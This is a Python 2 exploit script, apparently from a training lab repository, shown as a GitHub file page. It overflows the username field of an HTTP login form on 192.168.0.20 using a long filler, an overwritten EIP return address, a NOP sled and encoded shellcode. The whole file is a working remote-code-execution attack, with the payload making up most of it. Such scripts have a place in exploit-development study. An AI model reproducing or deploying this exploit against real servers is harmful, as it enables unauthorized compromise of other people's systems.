-
Notifications
You must be signed in to change notification settings - Fork 6
/
exthread.py
73 lines (61 loc) · 2.95 KB
/
exthread.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
#!/usr/bin/python
import socket
try:
print "\nSending evil buffer..."
shellcode = ("\xda\xd6\xd9\x74\x24\xf4\xb8\xb7\x91\x6c\x1b\x5b\x31\xc9\xb1"
"\x52\x83\xeb\xfc\x31\x43\x13\x03\xf4\x82\x8e\xee\x06\x4c\xcc"
"\x11\xf6\x8d\xb1\x98\x13\xbc\xf1\xff\x50\xef\xc1\x74\x34\x1c"
"\xa9\xd9\xac\x97\xdf\xf5\xc3\x10\x55\x20\xea\xa1\xc6\x10\x6d"
"\x22\x15\x45\x4d\x1b\xd6\x98\x8c\x5c\x0b\x50\xdc\x35\x47\xc7"
"\xf0\x32\x1d\xd4\x7b\x08\xb3\x5c\x98\xd9\xb2\x4d\x0f\x51\xed"
"\x4d\xae\xb6\x85\xc7\xa8\xdb\xa0\x9e\x43\x2f\x5e\x21\x85\x61"
"\x9f\x8e\xe8\x4d\x52\xce\x2d\x69\x8d\xa5\x47\x89\x30\xbe\x9c"
"\xf3\xee\x4b\x06\x53\x64\xeb\xe2\x65\xa9\x6a\x61\x69\x06\xf8"
"\x2d\x6e\x99\x2d\x46\x8a\x12\xd0\x88\x1a\x60\xf7\x0c\x46\x32"
"\x96\x15\x22\x95\xa7\x45\x8d\x4a\x02\x0e\x20\x9e\x3f\x4d\x2d"
"\x53\x72\x6d\xad\xfb\x05\x1e\x9f\xa4\xbd\x88\x93\x2d\x18\x4f"
"\xd3\x07\xdc\xdf\x2a\xa8\x1d\xf6\xe8\xfc\x4d\x60\xd8\x7c\x06"
"\x70\xe5\xa8\x89\x20\x49\x03\x6a\x90\x29\xf3\x02\xfa\xa5\x2c"
"\x32\x05\x6c\x45\xd9\xfc\xe7\xaa\xb6\xfe\xeb\x42\xc5\xfe\x12"
"\x28\x40\x18\x7e\x5e\x05\xb3\x17\xc7\x0c\x4f\x89\x08\x9b\x2a"
"\x89\x83\x28\xcb\x44\x64\x44\xdf\x31\x84\x13\xbd\x94\x9b\x89"
"\xa9\x7b\x09\x56\x29\xf5\x32\xc1\x7e\x52\x84\x18\xea\x4e\xbf"
"\xb2\x08\x93\x59\xfc\x88\x48\x9a\x03\x11\x1c\xa6\x27\x01\xd8"
"\x27\x6c\x75\xb4\x71\x3a\x23\x72\x28\x8c\x9d\x2c\x87\x46\x49"
"\xa8\xeb\x58\x0f\xb5\x21\x2f\xef\x04\x9c\x76\x10\xa8\x48\x7f"
"\x69\xd4\xe8\x80\xa0\x5c\x08\x63\x60\xa9\xa1\x3a\xe1\x10\xac"
"\xbc\xdc\x57\xc9\x3e\xd4\x27\x2e\x5e\x9d\x22\x6a\xd8\x4e\x5f"
"\xe3\x8d\x70\xcc\x04\x84")
filler = "A" * 780
eip = "\x83\x0c\x09\x10"
offset = "C" * 4
nops = "\x90" * 10
inputBuffer = filler + eip + offset + nops + shellcode
content = "username="+inputBuffer+"&password=A"
#-- Recreate the HTTP headers as seen from Wireshark --#
buffer = "POST /login HTTP/1.1\r\n"
buffer += "Host: 192.168.0.20\r\n"
buffer += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0\r\n"
buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
buffer += "Accept-Language: en-US,en;q=0.5\r\n"
# Encoding not in training
buffer += "Accept-Encoding: gzip, deflate\r\n"
buffer += "Referer: http://192.168.0.20/login\r\n"
buffer += "Content-Type: application/x-www-form-urlencoded\r\n"
buffer += "Content-Length: " + str(len(content)) + "\r\n"
# The DNT header not in training
buffer += "DNT: 1\r\n"
# Connection is closed in training
#buffer += "Connection: keep-alive\r\n"
buffer += "Connection: close\r\n"
# Not included in manual
buffer += "Upgrade-Insecure-Requests: 1\r\n"
buffer += "\r\n"
buffer += content
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.0.20",80))
s.send(buffer)
s.close()
print "\nDone!"
except:
print "Could not connect!"